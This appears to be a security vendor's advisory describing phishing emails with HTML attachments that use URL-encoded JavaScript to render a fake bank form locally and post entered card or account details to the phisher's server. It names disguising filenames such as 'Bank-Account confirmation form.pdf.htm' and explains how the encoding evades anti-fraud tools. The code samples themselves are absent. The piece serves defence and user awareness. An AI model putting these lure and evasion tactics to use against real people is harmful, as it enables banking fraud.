We have recently come across a different type of phishing attack that involves JavaScript being used to attempt to trick users into submitting sensitive banking-related information. This type of attack usually carries an HTML file attachment. The HTML file will locally open a look-alike bank submission form with the capability to pass critical user information to the phisher’s server.
Case 1
In the past, we monitored attacks with a similar type of file attachment, but they contained straightforward redirection code. There are different ways to redirect users to the desired location. One of the simpler HTML codes for redirection is shown below:
Sample image of the message:
When the user opens the attachment, the redirection code is executed, thus opening the phishing site. However, this approach has some limitations: even though the phishing link stays hidden in the attachment, when opening with an Internet browser, various anti-fraud tools may catch it and block it.
Case 2
The Change in Approach: This modified version hides not only the HTML code from the human eye, but may also find its way through anti-fraud tools. Here, the HTML code is URL encoded and it uses JavaScript to render the output as an HTML page. URL encoding of the JavaScript code makes it difficult to understand the lines without decoding it into human readable format.
Contents of the attached HTML file (URL encoded):
As shown above in the above example, the JavaScript function “unescape” will be used to decode and render the HTML file for the user. When we decoded the above lines, we got the full JavaScript code.
Contents of the attached HTML file (decoded):
This file is opened as a “local” HTML file, as shown below:
The address on the browser will show something similar to the examples given below. These links may change according to the user preferences and operating system:
1. If the file is saved on the desktop:
file:///C:/Documents%20and%20Settings/user_name/Desktop/banknamehidden%20Bank-Account%20confirmation%20form.pdf.htm
or…
2. If the file is opened directly:
file:///C:/DOCUME~1/USERNAME_~1/LOCALS~1/Temp/banknamehidden%20Bank-Account%20confirmation%20form.pdf-2.htm
As shown above in the message snapshot, the user is encouraged to open the attachment. Names for the attached file can also be another point of confusion for the user. Some examples of the filenames include:
Account reset form.pdf.htm
Bank-Account confirmation form.pdf.htm
Today, most banks send their account statements in PDF format. Users may think that the attached file is a PDF and subsequently be tricked into opening an HTML file.
In addition, the HTML page shown above looks like an authentic bank home page; however, users may be tricked into entering their bank information (credit card number or bank account details). This data is collected and sent over to the phisher’s server using the HTTP Post Request method. Currently this attack is limited to phishing, but the tactic may easily be used for other malicious activities as well.
Symantec is continuously monitoring this trend and, advises users to be cautious when opening attachments that are an HTML file type, especially when they have arrived from unknown source.